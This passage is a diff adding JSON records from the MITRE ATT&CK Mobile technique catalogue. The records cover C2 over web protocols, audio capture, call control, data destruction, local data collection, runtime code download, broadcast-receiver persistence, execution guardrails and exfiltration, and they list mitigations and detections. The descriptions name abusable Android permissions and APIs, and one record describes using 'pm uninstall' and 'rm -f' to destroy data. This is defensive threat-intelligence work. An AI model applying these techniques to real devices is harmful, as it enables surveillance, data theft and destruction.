+                        "Android"
+                    ],
+                    "x_mitre_tactic_type": [
+                        "Post-Adversary Device Access"
+                    ],
+                    "x_mitre_version": "1.2",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.627000+00:00\", \"old_value\": \"2025-10-24 17:48:40.140000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.2",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1011: User Guidance",
+                            "M1012: Enterprise Policy",
+                            "M1013: Application Developer Guidance"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0611: Detection of Access Notifications"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--2282a98b-5049-4f61-9381-55baca7c1add",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2022-04-01 19:06:27.177000+00:00",
+                    "modified": "2026-05-12 15:12:00.622000+00:00",
+                    "name": "Web Protocols",
+                    "description": "Adversaries may communicate using application layer protocols associated with web protocols traffic to avoid detection/network filtering by blending in with existing traffic. Commands to remote mobile devices, and often the results of those commands, will be embedded within the protocol traffic between the mobile client and server. \n\nWeb protocols such as HTTP and HTTPS are used for web traffic as well as well as notification services native to mobile messaging services such as Google Cloud Messaging (GCM) and newly, Firebase Cloud Messaging (FCM), (GCM/FCM: two-way communication) and Apple Push Notification Service (APNS; one-way server-to-device).  Such notification services leverage HTTP/S via the respective API and are commonly abused on Android and iOS respectively in order blend in with routine device traffic making it difficult for enterprises to inspect. ",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-mobile-attack",
+                            "phase_name": "command-and-control"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1437/001",
+                            "external_id": "T1437.001"
+                        },
+                        {
+                            "source_name": "NIST Mobile Threat Catalogue",
+                            "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-29.html",
+                            "external_id": "APP-29"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Android",
+                        "iOS"
+                    ],
+                    "x_mitre_tactic_type": [
+                        "Post-Adversary Device Access"
+                    ],
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.622000+00:00\", \"old_value\": \"2025-10-24 17:48:31.318000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.0",
+                    "changelog_mitigations": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0620: Detection of Web Protocols"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--6683aa0c-d98a-4f5b-ac57-ca7e9934a760",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2017-10-25 14:48:12.913000+00:00",
+                    "modified": "2026-05-12 15:12:00.637000+00:00",
+                    "name": "Audio Capture",
+                    "description": "Adversaries may capture audio to collect information by leveraging standard operating system APIs of a mobile device. Examples of audio information adversaries may target include user conversations, surroundings, phone calls, or other sensitive information. \n\n \n\nAndroid and iOS, by default, require that applications request device microphone access from the user.  \n\n \n\nOn Android devices, applications must hold the `RECORD_AUDIO` permission to access the microphone or the `CAPTURE_AUDIO_OUTPUT` permission to access audio output. Because Android does not allow third-party applications to hold the `CAPTURE_AUDIO_OUTPUT` permission by default, only privileged applications, such as those distributed by Google or the device vendor, can access audio output.(Citation: Android Permissions) However, adversaries may be able to gain this access after successfully elevating their privileges. With the `CAPTURE_AUDIO_OUTPUT` permission, adversaries may pass the `MediaRecorder.AudioSource.VOICE_CALL` constant to `MediaRecorder.setAudioOutput`, allowing capture of both voice call uplink and downlink.(Citation: Manifest.permission) \n\n \n\nOn iOS devices, applications must include the `NSMicrophoneUsageDescription` key in their `Info.plist` file to access the microphone.(Citation: Requesting Auth-Media Capture)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-mobile-attack",
+                            "phase_name": "collection"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1429",
+                            "external_id": "T1429"
+                        },
+                        {
+                            "source_name": "Manifest.permission",
+                            "description": "Android Developers. (2022, March 17). Voice Call. Retrieved April 1, 2022.",
+                            "url": "https://developer.android.com/reference/android/media/MediaRecorder.AudioSource#VOICE_CALL"
+                        },
+                        {
+                            "source_name": "Requesting Auth-Media Capture",
+                            "description": "Apple Developers. (n.d.). Requesting Authorization for Media Capture on iOS. Retrieved April 1, 2022.",
+                            "url": "https://developer.apple.com/documentation/avfoundation/cameras_and_media_capture/requesting_authorization_for_media_capture_on_ios"
+                        },
+                        {
+                            "source_name": "Android Permissions",
+                            "description": "Google. (2021, August 11). Manifest.permission. Retrieved September 22, 2021.",
+                            "url": "https://developer.android.com/reference/android/Manifest.permission"
+                        },
+                        {
+                            "source_name": "Android Privacy Indicators",
+                            "description": "Google. (n.d.). Privacy Indicators. Retrieved April 20, 2022.",
+                            "url": "https://source.android.com/devices/tech/config/privacy-indicators"
+                        },
+                        {
+                            "source_name": "iOS Mic Spyware",
+                            "description": "ZecOps Research Team. (2021, November 4). How iOS Malware Can Spy on Users Silently. Retrieved April 1, 2022.",
+                            "url": "https://blog.zecops.com/research/how-ios-malware-can-spy-on-users-silently/"
+                        },
+                        {
+                            "source_name": "NIST Mobile Threat Catalogue",
+                            "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-19.html",
+                            "external_id": "APP-19"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Android",
+                        "iOS"
+                    ],
+                    "x_mitre_tactic_type": [
+                        "Post-Adversary Device Access"
+                    ],
+                    "x_mitre_version": "3.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.637000+00:00\", \"old_value\": \"2025-10-24 17:48:52.833000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "3.1",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1006: Use Recent OS Version",
+                            "M1011: User Guidance"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0673: Detection of Audio Capture"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--351ddf79-2d3a-41b4-9bef-82ea5d3ccd69",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2021-09-20 13:42:20.824000+00:00",
+                    "modified": "2026-05-12 15:12:00.625000+00:00",
+                    "name": "Call Control",
+                    "description": "Adversaries may make, forward, or block phone calls without user authorization. This could be used for adversary goals such as audio surveillance, blocking or forwarding calls from the device owner, or C2 communication.\n\nSeveral permissions may be used to programmatically control phone calls, including:\n\n* `ANSWER_PHONE_CALLS` - Allows the application to answer incoming phone calls(Citation: Android Permissions)\n* `CALL_PHONE` - Allows the application to initiate a phone call without going through the Dialer interface(Citation: Android Permissions)\n* `PROCESS_OUTGOING_CALLS` - Allows the application to see the number being dialed during an outgoing call with the option to redirect the call to a different number or abort the call altogether(Citation: Android Permissions)\n* `MANAGE_OWN_CALLS` - Allows a calling application which manages its own calls through the self-managed `ConnectionService` APIs(Citation: Android Permissions)\n* `BIND_TELECOM_CONNECTION_SERVICE` - Required permission when using a `ConnectionService`(Citation: Android Permissions)\n* `WRITE_CALL_LOG` - Allows an application to write to the device call log, potentially to hide malicious phone calls(Citation: Android Permissions)\n\nWhen granted some of these permissions, an application can make a phone call without opening the dialer first. However, if an application desires to simply redirect the user to the dialer with a phone number filled in, it can launch an Intent using `Intent.ACTION_DIAL`, which requires no specific permissions. This then requires the user to explicitly initiate the call or use some form of [Input Injection](https://attack.mitre.org/techniques/T1516) to programmatically initiate it.",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-mobile-attack",
+                            "phase_name": "collection"
+                        },
+                        {
+                            "kill_chain_name": "mitre-mobile-attack",
+                            "phase_name": "impact"
+                        },
+                        {
+                            "kill_chain_name": "mitre-mobile-attack",
+                            "phase_name": "command-and-control"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1616",
+                            "external_id": "T1616"
+                        },
+                        {
+                            "source_name": "Android Permissions",
+                            "description": "Google. (2021, August 11). Manifest.permission. Retrieved September 22, 2021.",
+                            "url": "https://developer.android.com/reference/android/Manifest.permission"
+                        },
+                        {
+                            "source_name": "NIST Mobile Threat Catalogue",
+                            "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-41.html",
+                            "external_id": "APP-41"
+                        },
+                        {
+                            "source_name": "NIST Mobile Threat Catalogue",
+                            "url": "https://pages.nist.gov/mobile-threat-catalogue/cellular-threats/CEL-42.html",
+                            "external_id": "CEL-42"
+                        },
+                        {
+                            "source_name": "NIST Mobile Threat Catalogue",
+                            "url": "https://pages.nist.gov/mobile-threat-catalogue/cellular-threats/CEL-36.html",
+                            "external_id": "CEL-36"
+                        },
+                        {
+                            "source_name": "NIST Mobile Threat Catalogue",
+                            "url": "https://pages.nist.gov/mobile-threat-catalogue/cellular-threats/CEL-18.html",
+                            "external_id": "CEL-18"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Gaetan van Diemen, ThreatFabric"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Android"
+                    ],
+                    "x_mitre_tactic_type": [
+                        "Post-Adversary Device Access"
+                    ],
+                    "x_mitre_version": "1.2",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.625000+00:00\", \"old_value\": \"2025-10-24 17:48:38.183000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.2",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1011: User Guidance"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0703: Detection of Call Control"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--9ef14445-6f35-4ed0-a042-5024f13a9242",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2023-09-22 19:09:15.698000+00:00",
+                    "modified": "2026-05-12 15:12:00.706000+00:00",
+                    "name": "Data Destruction",
+                    "description": "Adversaries may destroy data and files on specific devices or in large numbers to interrupt availability to systems, services, and network resources. Data destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives.  \n\nTo achieve data destruction, adversaries may use the `pm uninstall` command to uninstall packages or the `rm` command to remove specific files. For example, adversaries may first use `pm uninstall` to uninstall non-system apps, and then use `rm (-f) <file(s)>` to delete specific files, further hiding malicious activity.(Citation: rootnik_rooting_tool)(Citation: abuse_native_linux_tools)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-mobile-attack",
+                            "phase_name": "impact"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1662",
+                            "external_id": "T1662"
+                        },
+                        {
+                            "source_name": "rootnik_rooting_tool",
+                            "description": "Hu, W., et al. (2015, December 4). Rootnik Android Trojan Abuses Commercial Rooting Tool and Steals Private Information. Retrieved September 26, 2023.",
+                            "url": "https://unit42.paloaltonetworks.com/rootnik-android-trojan-abuses-commercial-rooting-tool-and-steals-private-information/"
+                        },
+                        {
+                            "source_name": "abuse_native_linux_tools",
+                            "description": "Surana, N., et al. (2022, September 8). How Malicious Actors Abuse Native Linux Tools in Attacks. Retrieved September 26, 2023.",
+                            "url": "https://www.trendmicro.com/en_za/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Liran Ravich, CardinalOps"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Android"
+                    ],
+                    "x_mitre_tactic_type": [
+                        "Post-Adversary Device Access"
+                    ],
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.706000+00:00\", \"old_value\": \"2023-09-27 21:09:27.288000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1011: User Guidance"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0671: Detection of Data Destruction"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--e1c912a9-e305-434b-9172-8a6ce3ec9c4a",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2019-10-10 15:12:42.790000+00:00",
+                    "modified": "2026-05-12 15:12:00.722000+00:00",
+                    "name": "Data from Local System",
+                    "description": "Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to exfiltration.  \n\n \n\nAccess to local system data, which includes information stored by the operating system, often requires escalated privileges. Examples of local system data include authentication tokens, the device keyboard cache, Wi-Fi passwords, and photos. On Android, adversaries may also attempt to access files from external storage which may require additional storage-related permissions. \n\n ",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-mobile-attack",
+                            "phase_name": "collection"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1533",
+                            "external_id": "T1533"
+                        },
+                        {
+                            "source_name": "NIST Mobile Threat Catalogue",
+                            "url": "https://pages.nist.gov/mobile-threat-catalogue/stack-threats/STA-41.html",
+                            "external_id": "STA-41"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Android",
+                        "iOS"
+                    ],
+                    "x_mitre_tactic_type": [
+                        "Post-Adversary Device Access"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.722000+00:00\", \"old_value\": \"2025-10-24 17:49:30.706000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.1",
+                    "changelog_mitigations": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0713: Detection of Data from Local System"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--6c49d50f-494d-4150-b774-a655022d20a6",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2017-10-25 14:48:14.460000+00:00",
+                    "modified": "2026-05-12 15:12:00.640000+00:00",
+                    "name": "Download New Code at Runtime",
+                    "description": "Adversaries may download and execute dynamic code not included in the original application package after installation. This technique is primarily used to evade static analysis checks and pre-publication scans in official app stores. In some cases, more advanced dynamic or behavioral analysis techniques could detect this behavior. However, in conjunction with [Execution Guardrails](https://attack.mitre.org/techniques/T1627) techniques, detecting malicious code downloaded after installation could be difficult.\n\nOn Android, dynamic code could include native code, Dalvik code, or JavaScript code that utilizes Android WebView\u2019s `JavascriptInterface` capability. \n\nOn iOS, dynamic code could be downloaded and executed through 3rd party libraries such as JSPatch. (Citation: FireEye-JSPatch) ",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-mobile-attack",
+                            "phase_name": "defense-evasion"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1407",
+                            "external_id": "T1407"
+                        },
+                        {
+                            "source_name": "FireEye-JSPatch",
+                            "description": "Jing Xie, Zhaofeng Chen, Jimmy Su. (2016, January 27). HOT OR NOT? THE BENEFITS AND RISKS OF IOS REMOTE HOT PATCHING. Retrieved December 9, 2016.",
+                            "url": "https://www.fireeye.com/blog/threat-research/2016/01/hot_or_not_the_bene.html"
+                        },
+                        {
+                            "source_name": "NIST Mobile Threat Catalogue",
+                            "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-20.html",
+                            "external_id": "APP-20"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Android",
+                        "iOS"
+                    ],
+                    "x_mitre_tactic_type": [
+                        "Post-Adversary Device Access"
+                    ],
+                    "x_mitre_version": "1.5",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.640000+00:00\", \"old_value\": \"2025-10-24 17:48:55.445000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.5",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1006: Use Recent OS Version"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0618: Detection of Download New Code at Runtime"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--3775a580-a1d1-46c4-8147-c614a715f2e9",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2022-03-30 14:41:00.672000+00:00",
+                    "modified": "2026-05-12 15:12:00.626000+00:00",
+                    "name": "Broadcast Receivers",
+                    "description": "Adversaries may establish persistence using system mechanisms that trigger execution based on specific events. Mobile operating systems have means to subscribe to events such as receiving an SMS message, device boot completion, or other device activities. \n\nAn intent is a message passed between Android applications or system components. Applications can register to receive broadcast intents at runtime, which are system-wide intents delivered to each app when certain events happen on the device, such as network changes or the user unlocking the screen. Malicious applications can then trigger certain actions within the app based on which broadcast intent was received. \n\nIn addition to Android system intents, malicious applications can register for intents broadcasted by other applications. This allows the malware to respond based on actions in other applications. This behavior typically indicates a more intimate knowledge, or potentially the targeting of specific devices, users, or applications. \n\nIn Android 8 (API level 26), broadcast intent behavior was changed, limiting the implicit intents that applications can register for in the manifest. In most cases, applications that register through the manifest will no longer receive the broadcasts. Now, applications must register context-specific broadcast receivers while the user is actively using the app.(Citation: Android Changes to System Broadcasts) ",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-mobile-attack",
+                            "phase_name": "persistence"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1624/001",
+                            "external_id": "T1624.001"
+                        },
+                        {
+                            "source_name": "Android Changes to System Broadcasts",
+                            "description": "Google. (2019, December 27). Broadcasts Overview. Retrieved January 27, 2020.",
+                            "url": "https://developer.android.com/guide/components/broadcasts#changes-system-broadcasts"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Alex Hinchliffe, Palo Alto Networks"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Android"
+                    ],
+                    "x_mitre_tactic_type": [
+                        "Post-Adversary Device Access"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.626000+00:00\", \"old_value\": \"2025-10-24 17:48:39.155000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.1",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1006: Use Recent OS Version"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0711: Detection of Broadcast Receivers"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--498e7b81-238d-404c-aa5e-332904d63286",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2022-03-30 20:31:16.624000+00:00",
+                    "modified": "2026-05-12 15:12:00.630000+00:00",
+                    "name": "Execution Guardrails",
+                    "description": "Adversaries may use execution guardrails to constrain execution or actions based on adversary supplied and environment specific conditions that are expected to be present on the target. Guardrails ensure that a payload only executes against an intended target and reduces collateral damage from an adversary\u2019s campaign. Values an adversary can provide about a target system or environment to use as guardrails may include environment information such as location.(Citation: SWB Exodus March 2019)\n\nGuardrails can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This use of guardrails is distinct from typical [System Checks](https://attack.mitre.org/techniques/T1633/001). While use of [System Checks](https://attack.mitre.org/techniques/T1633/001) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of guardrails will involve checking for an expected target-specific value and only continuing with execution if there is such a match.",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-mobile-attack",
+                            "phase_name": "defense-evasion"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1627",
+                            "external_id": "T1627"
+                        },
+                        {
+                            "source_name": "SWB Exodus March 2019",
+                            "description": "Security Without Borders. (2019, March 29). Exodus: New Android Spyware Made in Italy. Retrieved November 17, 2024.",
+                            "url": "https://web.archive.org/web/20200314194610/https://securitywithoutborders.org/blog/2019/03/29/exodus.html"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Android",
+                        "iOS"
+                    ],
+                    "x_mitre_tactic_type": [
+                        "Post-Adversary Device Access"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.630000+00:00\", \"old_value\": \"2025-10-24 17:48:44.210000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.1",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1006: Use Recent OS Version",
+                            "M1011: User Guidance"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0653: Detection of Execution Guardrails"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--37047267-3e56-453c-833e-d92b68118120",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2022-04-06 13:22:57.683000+00:00",
+                    "modified": "2026-05-12 15:12:00.626000+00:00",
+                    "name": "Exfiltration Over Unencrypted Non-C2 Protocol",
+                    "description": "Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.\n\nAdversaries may opt to obfuscate this data, without the use of encryption, within network protocols that are natively unencrypted (such as HTTP, FTP, or DNS). Adversaries may employ custom or publicly available encoding/compression algorithms (such as base64) or embed data within protocol headers and fields.",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-mobile-attack",
+                            "phase_name": "exfiltration"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1639/001",
+                            "external_id": "T1639.001"
+                        },
+                        {
+                            "source_name": "NIST Mobile Threat Catalogue",
+                            "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-30.html",
+                            "external_id": "APP-30"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Android",
+                        "iOS"
+                    ],
+                    "x_mitre_tactic_type": [
+                        "Post-Adversary Device Access"
+                    ],
+                    "x_mitre_version": "1.1",
